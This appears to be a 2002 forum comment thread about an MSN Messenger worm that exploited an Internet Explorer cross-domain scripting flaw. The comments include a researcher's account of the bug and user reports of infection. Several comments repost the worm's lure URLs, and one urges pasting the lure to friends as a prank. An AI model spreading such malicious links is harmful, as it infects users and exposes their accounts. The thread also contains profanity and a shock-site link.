But why did you go there anyway?

The Register this morning had the head line of
"MSN Messenger worm entices the unwary" should have read "MSN Messenger worm entices the downright stupid"

Lets just click on any link we get eh?

Goddamn it i have to deal with people like this every bloody day.

AARRGGGHHHH!

You need to get through these people.

[mickeyreznor]

Don't say:

"I suggest you do not follow the link"

Say:

Don't click on the link unless you want your computer to be fucked.

Re:CAPITALS ARE GOOD

[amanb]

> I hate my COBOL! course

Is that the Yahoo! version of COBOL?

Re:COBOL

>Why is it being old make it bad?

I think the question is, why not?

Sounds like Ladarvision

[Animats]

Ladarvision's FDA evaluation contains the following:

• Device failures:

  Six eyes experienced interruptions during the surgical procedure due to laser system failures: a faulty on/off switch (1); internal timing error (3), double pressing of footswitch by operator (1); and failure to track due to simultaneous activation of tracking and printing (1).

Note that most of the reported problems are timing related. Medical gear should be using a true real time OS, like QNX, with maximum latency guarantees.

Re:Well, that's one less effectual site for vector

[cygnus]

the slashdot effect should sufic to kill any of the infection sites, and with a high degree of impact.

little did the visitors of Slashdot.org know, they were unwitting participants in the world's first human-powered smurf attack experiment.

Thou art a troll

[LPetrazickis]

Since when is posting a controversial and unsupported claim not considered trolling? There are many valid applications of Javascript and X10-style ads are easy to control in Opera and - hopefully - Mozilla.

Re:Thou art a troll

[ethereal]

It was controversial. It was not unsupported; he provided as much support for his position as you have. It's just a matter of opinion as to whether the valid applications of javascript make the annoying applications worth it.

Personally, I have no problem with javascript as long as it acts only within the page that it was loaded on. When it tries to take over duties that belong to my window manager, though, I get unhappy. 95% of javascript's problems would go away if it couldn't open new windows and/or resize them. Besides, people should be middle-clicking to do "open link in new window" anyway :)

Re:Thou art a troll

[rifter]

Indeed, on any platform Mozilla runs on, it lets you disable these "features" of javascript and still run javascript and java. Konquerer lets you turn off popups, but I haven't seen it available for anything but Linux.

Mozilla lets you disable popup windows, status bar changes, resizing, and raising/lowering windows.

formmail.pl?

[autopr0n]

What does a server side Perl thing have to do with an MSN bug? Is this thing attacking vulnerable web servers to propagate it's malicious Jscript?

Intresting.

Goatse.cx has moved

Goatse.cx has moved to http://www.hick.org/goat/

Spamming

[byronbussey]

Well it's only a matter of time until this type of things becomes another way to advertize the fact that "My University Degree is Ready for $19.99"

bjb

Re:Use Trillian... Well, maybe.

[Balinares]

Just one (well, two) minor caveats, if you don't mind. :)
To start with, Trillian doesn't support the Jabber protocol. That is annoying (Jabber rocks, dontcha know).
Second problem, Trillian knows nothing of \n carriage returns. It means that, if a friend using, say, licq or some Jabber implementation on Linux/*BSD/whatever sends you a message, the carriage returns won't be displayed properly. That's pretty annoying -- such messages will generally become very hard to read. I notified the dev team about this bug, but they never deemed necessary to answer my email. Oh well, I guess I'll stick with Jabber. :)

Oh my god, we slashdotted Windows Update!

[yerricde]

Now, I try [Windows Update] again, and I'm getting the same old Can't Find Server message. Anyone else having problems with the site, or is it just me?

Between the SNMP scare and this vulnerability, Windows Update is probably just slashdotted.

Re:Oh my god, we slashdotted Windows Update!

Windows Update is probably just slashdotted.

That's beautiful.

RSS ticker

[yerricde]

Why not add a Javascript ticker-tape display to Slashdot so we can just watch the M$ virii/security-holes flash by like so many stock market reports?

Slashdot already exports an RSS feed of its stories. Just point an RSS ticker applet or script at the RSS feed and watch the stories scroll by.

Found another site....

Hey I just got a MSN message from a friend who then said not to go to the site because he didn't sent it :)

"URGENT - Go to http://users.skynet.be/dark.angel/cool.htm"

I looked at the souce and it's another one :)

Just for fun...

If you want to fuck with your mates a little, just copy and paste the following into an MSN IM: "Go To http://www.masenko-media.net/cool.html NoW"

mwaaaahahahahahahah!

How ironic that...

[Guppy06]

... this happens right smack dab in the middle of Microsoft's self-proclaimed Focus on Security Month.

What? No Porn popups?

[Robber+Baron]

What a sucky virus! They shoulda had it popping up porn sites in separate windows...just what the unsuspecting doofus needs when the boss walks in...

somewhat disappointed...

I thought the title meant a warhol worm at first.

World-wide worm propagation in 15 minutes. Finally something worth the attention given to not-so-well designed worms such as code red.

Re:this didn't infect me.. because i got rid of it

edit the \WINDOWS\inf\sysoc.inf
look for
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
delete the hide part then you can uninstall ms messenger by using the add/remove windows components.
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7 is what it should look like in the end

6 Degrees....

[Dismissile]

I just stumbled across this idea, but since there are numerous posts about this, i was thinking... Wow, what a nerd.. then I was thinking... Hey, this is like a HUGE example of 6 degrees of separation, and I am linked to anyone else who got the MSN message, and not only am I linked to you, but we were both online at the same time... who's the nerd now?

net?

[ColaMan]

Hmm.

Is that net or (dot)NET?

Bold prediction : same (dot)NET slashdot story , 2 years from now.

Don't Click!Re:Where is Windows Update?

Don't Click! - that's the Messenger/IE worm site!!

It goes even deeper than that

[Slur]

Have you ever seen the instruction set architecture of the Intel processor family? It's kludges and spaghetti all the way from the candy coated XP shell down to the chewy x86 center. To experienced geeks like me it feels like a sticky film coating every PC. For elegance and thoughtful design you have to go to processors that were born in the 80s and 90s -- and the non-Microsoft OSs that run on them.

I got it too

[mikey13]

I got this URL from a friend, so of course, I opened it in Opera, and when nothing happened, I thought...

"Just like every other site that was written with only IE in mind, I had better open this in IE so I can see what it really is."

*sigh*

Can anyone name

[The+Panther!]

...a 'popular' Microsoft product that hasn't had virus capability? Word, Excel, Outlook, Outlook Express, countless Windows 3.1 thru 2000, hell, XP is a honey pot OS just by connecting it to a network. My point being, why is this news? Anything you run with M$ in the About box will at some point destroy one or more aspects of your computer, be it the hard drive, cpu, network connection, etc. Today it's the IM. Tomorrow it'll be the icon editor...

Don't You Be Dissin' BBC Basic!

[phliar]

they would rather have BBC BASIC (oh, wait, VB _is_ BASIC rofl :)

Hey waitaminnit!!! I got my hands on an Acorn BBC Micro, back in '83 or '84... yes, it was called Basic but it was Basic in name only. Control structures, strings, and a really nice way to put in asm code in-line. The 6502 -- ah, now there was a nice architecture. Beaten only by the PDP-11. I wish I'd made backups of my code though....

Saw the TV show too. Cool.

Re:Gee...

[LadyLucky]

Heh, that's peanuts.

I went through Australia's only nuclear reactor, which is at Lucas Heights near Sydney, and inside the reactor (as in 3m from the fissioning uranium), what do I see, but many-a-start-button lurking around.

Actually, it's not as interesting as that. They dont control stuff, they just log data from experiments being performed. That and there was a button rigged up labelled "Dont press me", with a counter behind it to found out how many times it got pressed :-)

This is not ECMAscript but VBScript

[xutopia]

This virus does not use ECMAScript so it will not work if you didn't have Internet Explorer installed on your machine. Mozilla, Netscape as well as Konquerer and Opera shouldn't be affected by this. The code looks too darn easy. I can't believe people can have access so easily to your machine!

Explanation of code

[tomgilder]

Hi there, I was the one along with Thor Larholm who originally demoed this exploit on my website.

We did so as to attempt to put pressure on Microsoft to patch several major holes in Internet Explorer - the one we exploited (document.open) took MS exactly fifty four days to make a patch from, from it being publicly disclosed.

We felt this was pathetic, and the public had a right to know what Microsoft's bad programming could cause - none of the previous examples of the document.open hole had shown to what extent this could be exploited.

This new worm, although harmless, is a direct rip of the example code from our bulletin, modified to also e-mail the contact list and MSN sing-in name to an e-mail address.

As long as Microsoft continues to support the flawed security model of ActiveX, integrating products together this closely, such things will continue to happen.

The next MSN worm might be far worse.

Please, please all Internet Explorer users patch your systems now. If you are using IE5.0 or lower, MS haven't produced a patch for you - they clearly care more about their product lifecycles than customer's security. I strongly suggest upgrading to 5.5 or 6, failing that disable active scripting.

I'm also interested as to why Slashdot felt the need to approve this article about a worm, as several people submitted stories about my original MSN exploit example. Oh well, guess you need things in the wild before telling people?

Re:Explanation of code

[thorlarholm]

As Tom pointed out, it is amusing that this is posted now as a "worm article" instead of as an "example exploit" when we originally posted our bulletin on February 8th.

What is even more amusing is how the media, including Slashdot, seem to have misunderstood the bulletin entirely. This is not a flaw in MSN Messenger, this is a flaw in Internet Explorer - called crossdomain scripting.
Using MSN Messenger for our example was - just that, an example. We could as easily have used a .NET application and thus miscredited that Microsoft product instead.

Another amusing aspect is how people tie this together with the "privacy disclosure" vulnerability found last week in MSN Messenger. These are 2 completely different things. The "privacy disclosure" gives a malicious programmer the names (and possibly email adresses) of the user and his friends.
This vulnerability allows you to hijack the users MSN Messenger - the application itself ! This is why you can send messages through it, as you can do anything with the application that a normal enduser would be able to - including, but not limited to, sending messages, emails and files and co-starting appplications on the users machine (yes, this allows you to remote control a users entire Windows machine !).

Now, that should have cleared up a few things.

With regards to the latest "superpatch", Microsoft claims that it "eliminates all known security vulnerabilities affecting Internet Explorer 5.01, 5.5 and 6.0.".

As you can see on our vulnerability highlight page, this is not true.

It is still very much possible for a malicious programmer to read a users local files and execute arbitrary commands - even when you are fully patched !

Removing Messaging from Windows2000/XP

[TangoCharlie]

I saw a peice from uThe inquirer about a little hack which winxp/2k users can use to enable them toZapp the unwanted bits of XP.... like Microsoft Instant Messaging. Useful stuff.

Only the paranoid will survive...

[jonr]

Well, I tried the Register demostration page, and I only got this:
"Sorry, there was an error in the script.
This may well be due to your IE security settings - try resetting them to default and trying again.
..."
IE6 is much better when it comes to security and privacy than IE5.

msn mac

Does this effect the mac messenger client as well?

Anti Virus Virus?!

[The+SpEyE]

Aah, the wonders of Microsoft... It still amases me to know how many really good programmers they have working for them, yet they can still leave massive gaps in system security, I mean, come on - some of them MUST have some common sense... ... right? Anyhow - on with the reply BTW - I'm new here, so excuse me if I say something thats all ready been said.. A few mates and me, at college, have been working on a few idea's about system security (for a project we've been given by the college), and one of the things that we came up with was an Anti Virus, Virus. Based on the idea of a GTV (Genetically Targeting Virus), its a small program, that circulates itself like a virus or worm, but instead of causing damage to a system, it prevents one type of virus from affecting that system. Thoughts and comments are welcome

Re:Anti Virus Virus?!

[nagora]

Lot of people have tried/suggested this, but the problem is trust. If I see that a program has arrived and claims to be "helping" me, do I trust it? Even if I trust you, how do I know that someone somewhere hasn't hacked your code to use it as a Trojan horse into systems where your anti-virus virus is accepted?

TWW

But on the contrary.. messenger is full of flaws

[IamTheRealMike]

This happens all the time, there are in fact several different MSN Messenger virii, not all of which use IE. Some of them just send files to you, such as the infamous ;) Choke virus.

What pisses me off about this is that Microsoft is the one who makes all the money from this, yet I am the one who has to clean up my friends computers every third Tuesday for them, because MSN allows any program (or indeed website, it's used on the msn portal pages) to access it's internal objects via COM. Not that there is anything wrong with this idea, but due to their lax coding, it's people like me who get to pick up the pieces.

As I access MSN via Jabber I can't be infected with these viruses anyway, but the fact that MSN isn't even a particularly great chat program especially rankles.

Re:Gee...

[IainHere]

That's interesting, look further down the page, and there's Possibility of a Warhol Worm: Complete infection in 15 minutes! from August 2001.

i think its been /.'ed

[thetechfreak]

i only just got on after a format and site is down...wahay :D

i was tryin to download the page without going to it (save link as) so i could see how it did (for no malicious reasons), i know about the security problem, more info on msnfanatic.com

My friends speaks spanish

So I don't know any body that can write this to me:
"Go To http://www.masenko-media.net/cool.html NoW !!!"

For me:
English+CAPS+!!! = Spam :)

Where is MS Technet Update?

[LittleGuy]

M$ is suppose to have a Security Notification Service
which informs you by E-mail when a new Security Bulletin is available. Ever since the December Uber-Patch, the system has been malfunctioning, and useless.

The easiest way I found was anticipating the URL (http://www.microsoft.com/technet/treeview/default .asp?url=/technet/security/bulletin/ms02-nnn.asp, where nnn is the next Bulletin in sequence), but oddly enough, I discovered MS02-005 on the McAfee homepage.

Look mum! My first redundant post!

[colonelteddy]

How often do you see a url on a slashdot story halfway down the page (or even with >5 comments) that doesnt result in a 404 error???

If sites that are around to provide exploits in IE+MSN Messenger have a good enough server to keep themselves up underneath the traffic the messages are sending them from stupid people, and even a half hearted slashdot effect, then they are obviously pretty dedicated to being mildly annoying.

IExplore bugs.

[13Echo]

I don't get all of you pro-Internet Explorer folks. Is it not blatantly obvious that this shit is put into the browser intentionally? You don't see Opera or Mozilla getting patched for these types for things...

And yet... People stil use IExploder cause it is convenient.

Re:CAPITALS ARE GOOD

[The_Unforgiven]

I, too, despise COBOL. It is the work of the devil, I say!

Coincidence?

[Lxy]

Is anyone else finding a coincidence here that this follows a story entitled "what is .NET?"? I think we now know :-)

Not in my book...

[jotaeleemeese]

The program itself is telling you how to try to bypass security.

Unless one is a knowledgable person when it comes to computer issues, this should not be an option.

Re:this didn't infect me.. because i got rid of it

[gpinzone]

Yep, I did this, too. However, I noticed that when I run CNET's CatchUp scan, it picks up a MSN Messenger DLL still on my hard drive. I'm kind of afraid to delete it. I wonder if anything else is using it or if there still exists some kind of security risk with it being there?

Got me

[Smallest]

My host suspended my account for a day or two after this happened to me. They came down on me for "excessive" email sending. After a little digging, i found out that the emails were coming from my copy of formmail.pl.

I checked Matt's site, but didn't see any notices about this. Glad to see it was the script, not something I had done. (well, other than installing the script in the first place, i guess)

If i had the points, i'd mod you uP.
-c

Read some Niven

[marcus]

Check out "flash crowds", "flash riots", transport booths, etc. They are a "real world" version of "slashdotting". Or, I guess you could say that since these stories were written before /. that slashdotting is a virtual version of a flash crowd. It is the first that I ever heard of, that is where large numbers of people decide to "go somewhere" in a short period of time because of something that they had seen somewhere else.

Re:Gee...

[Cro+Magnon]

Unlike Dos, W95 isn't a single-tasking OS. There's crap running in the background that makes it LESS stable than Dos. And there's a big difference between a POS Dos system (used for sales) and a POS (piece of $h!t) W95 medical system. Finally, perhaps the reason the tech was trained to ignore error messages is because Windows throws them all the time.

Re:CAPITALS ARE GOOD

Perhaps it's a strategic name change geared to appeal to younger programmers, though a similar alteration didn't quite work for Hamilton!, Ohio.

This latest exploid DOES export MSN registry key!

I was hit this morning and like an insect flying toward a flame I clicked on the URL. Running IE without the Feb 11th fix and messenger... the script then sent the message to my contacts...

BUT THERE'S MORE...
One of my contacts later in the day used Messenger to check his hotmail account. Instead of getting his account he was LOGGED INTO MY ACCOUNT... reading MY MAIL. He let me know what happened...

What is scary is that I am worried that my MSN key is now out of the coup and who knows where. I've disabled auto-signin, changed my passport password, and installed the Feb 11th IE patch. However I am worried that nothing can be done to get my MSN key back...

Any thoughts?

Preston

Re: user's homepage

[Aanallein]

Not everything on the homepage is broken. Most pages in 'afbeeldingen' (images) are actually working.
Somehow, none of it strikes me as something built by someone who wrote that script, though. Not even if that someone only copied the script from somewhere else...

I'm thinking there's a good chance this exploit was only a way to take revenge for something on mmargae by someone else; can you imagine what this is doing to his account? - I don't know that much about the isp used here, but there's no way the user's account is equipped to handle such amount of email he must have been getting...
Then again, if this is only about revenge, why send the msn-logon of the infected person along?

Re:Gee...

yea, a linux kernel panic, followed by an ext2 fs corruption would be much, much better.

Patch

I don't know about anyone else but I've got the patch only to have it mess up my IDE drivers, don't know how but after the restart I lost my CDRW and the yellow flags (3) showed up in system manager. This happened on 2 of my computers and another of a business associate.